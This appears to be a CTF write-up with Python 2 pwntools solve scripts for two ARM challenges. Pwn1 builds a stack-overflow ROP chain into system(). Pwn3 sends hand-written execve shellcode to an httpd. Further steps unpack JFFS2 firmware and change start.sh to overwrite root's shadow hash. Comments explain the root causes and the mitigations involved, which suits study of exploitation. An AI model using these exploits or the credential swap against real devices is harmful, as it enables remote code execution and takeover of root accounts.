更新中…结营赛还有非常多值得探索的东西
Pwn1: easyserver
串口看输出
# Pwn1 (easyserver) solve script. Uses pwntools and Python 2 syntax
# (`print payload`, str + p32() concatenation); it will not run unchanged on Python 3.
from pwn import *
#context.log_level = 'debug'
# Challenge instance from the page (host, port).
p = remote('20.21.2.27', 59816)
# Absolute addresses baked into the chain: a `pop {r0, pc}` gadget, a spot inside
# the request buffer, and system(). Hard-coded addresses like these only hold when
# the target is loaded at a fixed address (presumably no PIE/ASLR on the service);
# address randomization is the mitigation whose absence this relies on.
pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158
cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
# Request line with the shell command placed after ';' so it lands in the server's
# request buffer; cmd_base+13 presumably points at that copy of `cmd` -- confirm
# against the binary's parser.
payload = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
# 1100 filler bytes overrun the stack buffer up to the saved return address, which is
# overwritten with the pop gadget; the gadget pops the next word into r0 (system's
# argument) and the following word into pc (system). cyclic(100) is trailing junk
# past the chain. Root-cause class: a fixed-size stack buffer filled from the request
# without a length check, presumably with no stack canary -- a bounds check or a
# stack protector would stop the return-address overwrite.
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload
p.send(payload)
p.interactive()
Pwn3: babyhttpd
串口看输出
# Pwn3 (babyhttpd) solve script. Uses pwntools and Python 2 semantics
# (asm() returns a str that is concatenated with plain strings).
from pwn import *
#context.log_level = 'debug'
# Assemble for 32-bit ARM, matching the board's CPU.
context(arch='arm')
# Earlier variant kept for reference: same stub, runs `/bin/ls /tmp` instead of cat.
# shellcode = asm('''
# add r4, pc, #56
# str r4, [sp, #8]
# sub r2, r2, r2
# strb r2, [r4, #4]
# sub r2, r2, r2
# add r3, pc, #28
# str r3, [sp, #4]
# str r2, [sp, #12]
# mov r0, r3, lsl r2
# strb r2, [r3, #7]
# add r3, pc, #4
# add r1, sp, #4
# strb r2, [r3, #1]
# swi 0x90ff0b
# ''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'
# Hand-written ARM stub followed by its argument string. As far as the listing shows:
# - `sub r2, r2, r2` zeroes r2 without a literal 0 in the encoding; r2 is then stored
#   as a NUL terminator (`strb`) into the appended string and as argv's NULL entry.
# - the pc-relative `add`s point r3/r4 into the string that follows the code, and
#   the `str ... [sp, #N]` stores build an argv array on the stack, r1 = &argv.
# - `strb r2, [r3, #1]` after `add r3, pc, #4` writes into the instruction stream
#   itself -- it appears to patch the `swi` immediate in place so the stored
#   shellcode contains no zero byte (the 0xff looks like a placeholder); confirm
#   against the instruction encoding. This only works because the request buffer
#   is executable: NX/W^X on the stack or heap would defeat this stub.
# - the `swi` immediate presumably encodes the execve system call in OABI style
#   (low byte 0x0b); the exact value executed depends on the patch above -- confirm.
# The padding slashes in the path presumably keep the NUL-terminator offsets
# (#25 and #8) aligned with the end of each argument.
shellcode = asm('''
add r4, pc, #60
str r4, [sp, #8]
sub r2, r2, r2
strb r2, [r4, #25]
sub r2, r2, r2
add r3, pc, #28
str r3, [sp, #4]
str r2, [sp, #12]
mov r0, r3, lsl r2
strb r2, [r3, #8]
add r3, pc, #4
add r1, sp, #4
strb r2, [r3, #1]
swi 0x90ff0b
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'
# Challenge instance from the page (host, port).
p = remote('20.21.2.27', 5000)
# Request line carrying the shellcode after six 0x11 bytes (presumably alignment or
# parser filler -- confirm against the httpd's request parsing), then the header end.
payload = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
# Body: 655 filler bytes overrun the buffer that holds `name=`, and 0x22504 replaces
# the saved return address; it presumably is where the request (and thus the stub)
# is buffered, which again requires a fixed load address and an executable buffer.
# Same root-cause class as Pwn1: an unchecked copy of attacker-sized input into a
# fixed stack buffer.
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'
p.send(payload)
p.interactive()
板子拿shell
jffs2解包
# Install jefferson to extract JFFS2 file systems
# NOTE(review): this pulls the tool from an unpinned git checkout and installs it
# as root (`sudo python setup.py install`); for a reproducible, auditable setup pin
# a known commit or tag and review it before installing -- the same applies to
# `pip install cstruct`, which is unpinned here.
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
# -M: walk extracted output recursively (matryoshka); -e: extract. The JFFS2
# portion of test.img is what jefferson was installed for.
binwalk -Me test.img
jffs2打包
# mtd-utils provides mkfs.jffs2.
sudo apt install mtd-utils
# Repack the (modified) rootfs directory into a JFFS2 image for re-flashing;
# the board-specific options (endianness, erase-block size, etc.) are not given
# on the page -- confirm they match the original image before flashing.
mkfs.jffs2 -r rootfs -o rootfs.img
修改start.sh
#!/bin/sh
# Modified start.sh: make a writable copy of /etc in /tmp, replace root's shadow
# entry with a known password hash, and overlay /etc with the copy so the new
# entry is what login consults.
cp -r /etc /tmp/
# The written entry is an MD5-crypt ($1$) hash for root; the value here is the one
# given on the page. From a defender's view this is the classic firmware-integrity
# problem: a boot script run from a writable image can swap credentials, which is
# what a verified/read-only rootfs (secure boot, dm-verity) is meant to prevent.
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
# NOTE(review): `-o loop` normally expects an image file rather than a directory;
# whether this overlay takes effect depends on the board's mount implementation
# (busybox or otherwise) -- confirm on the device.
mount -o loop /tmp/etc/ /etc